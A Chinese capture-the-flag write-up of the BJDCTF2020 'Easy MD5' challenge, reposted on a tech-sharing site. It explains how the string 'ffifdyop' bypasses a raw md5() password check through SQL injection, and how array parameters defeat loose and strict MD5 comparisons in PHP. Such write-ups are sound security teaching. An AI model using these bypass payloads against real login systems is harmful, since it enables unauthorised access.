标签：raw MD5 select 绕过 password md5 注入

来源[BJDCTF2020]Easy MD5

参考[BJDCTF2020]Easy MD5( .md5( $password, true)绕过)_xlcvv的博客-CSDN博客

HINT

 

Hint: select * from 'admin' where password=md5($pass,true)

 

 关于md5()

md5(string,raw)

参数	描述
string	必需。规定要计算的字符串。
raw	可选。规定十六进制或二进制输出格式： TRUE - 原始 16 字符二进制格式 FALSE - 默认。32 字符十六进制数

 有hint得知，raw参数为ture，即传入password值会输出为16字符二进制格式。同时此处查阅资料得到一个可以绕过该SQL语句的字符串      ffifdyop

<?php
var_dump(md5(ffifdyop));     //string(32) "276f722736c95d99e921722cf9ed621c"
var_dump(md5(ffifdyop,ture));   //运行会出现乱码"'or'6�]��!r,��b"    实际上为'or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c  
?>

同时mysql会自动解析成string  ---- 'or’6]!r,b

则SQL语句会变为 select * from 'admin' where password=''or'6]!r,b'  及   select * from 'admin' where password=''or true  实现绕过进入如下页面

MD5()绕过

审计代码发现为md5()比较，参考MD5绕过总结 - llllll7 - 博客园 (cnblogs.com)

进行数组绕过，payload:a[]=1&b[]=2  进入以下界面

 此处审计代码发现===为强类型比较，但对于MD5()来说仍然可以进行数组绕过

payload：param1[]=1&param2[]=2 得到flag

 

 

标签：raw,MD5,select,绕过,password,md5,注入
来源： https://www.cnblogs.com/llllll7/p/14847522.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。